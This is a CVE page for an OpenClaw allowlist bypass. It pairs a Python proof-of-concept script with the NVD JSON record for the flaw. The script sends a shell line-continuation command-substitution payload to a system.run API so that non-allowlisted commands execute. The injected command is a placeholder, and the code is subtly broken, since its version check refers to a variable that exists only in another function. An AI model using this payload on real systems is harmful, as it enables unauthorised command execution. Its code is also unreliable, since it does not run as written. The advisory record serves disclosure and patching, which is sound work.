CVE-2026-28460

# CVE-2026-28460 OpenClaw system.run Allowlist Bypass PoC # This PoC demonstrates bypassing the allowlist using shell line continuation # Reference: https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-shell-line-continuation-command-substitution-in-system-run import requests import json TARGET_URL = "http://target-openclaw-server:8080" API_KEY = "your_api_key_here" def exploit_allowlist_bypass(): """ Exploit the allowlist bypass in OpenClaw's system.run function by using shell line continuation characters to split command substitution. """ headers = { "Authorization": f"Bearer {API_KEY}", "Content-Type": "application/json" } # Malicious payload using line continuation to bypass allowlist # The $\ followed by newline and ( causes shell to fold the line # continuation into executable command substitution malicious_command = '"$\n(malicious_command_here)"' payload = { "action": "system.run", "command": malicious_command, "args": { "timeout": 30 } } try: response = requests.post( f"{TARGET_URL}/api/v1/execute", headers=headers, json=payload, timeout=10 ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: result = response.json() if result.get("success"): print("[+] Allowlist bypass successful! Command executed.") return True print("[-] Exploitation failed or target not vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def verify_version(): """Check if target is running a vulnerable version""" try: response = requests.get( f"{TARGET_URL}/api/v1/version", headers=headers, timeout=10 ) version = response.json().get("version", "") # Vulnerable if version < 2026.2.22 print(f"[*] Target version: {version}") return version except: return None if __name__ == "__main__": print("[*] CVE-2026-28460 OpenClaw Allowlist Bypass PoC") print("[*] Target:", TARGET_URL) version = verify_version() if version: exploit_allowlist_bypass()

{"cve": {"id": "CVE-2026-28460", "sourceIdentifier": "[email protected]", "published": "2026-03-19T02:16:02.603", "lastModified": "2026-03-25T15:16:39.837", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 contain an allowlist bypass vulnerability in system.run that allows attackers to execute non-allowlisted commands by splitting command substitution using shell line-continuation characters. Attackers can bypass security analysis by injecting $\\\\ followed by a newline and opening parenthesis inside double quotes, causing the shell to fold the line continuation into executable command substitution that circumvents approval boundaries."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.2.22 contienen una vulnerabilidad de omisión de lista de permitidos en system.run que permite a los atacantes ejecutar comandos no incluidos en la lista de permitidos dividiendo la sustitución de comandos mediante caracteres de continuación de línea de shell. Los atacantes pueden eludir el análisis de seguridad inyectando $\\\\ seguido de un salto de línea y un paréntesis de apertura dentro de comillas dobles, haciendo que el shell pliegue la continuación de línea en una sustitución de comandos ejecutable que elude los límites de aprobación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/3f0b9dbb36c86e308267924c0d3d4a4e1fc4d1e9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9868-vxmx-w862", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-shell-line-continuation-command-substitution-in-system-run", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}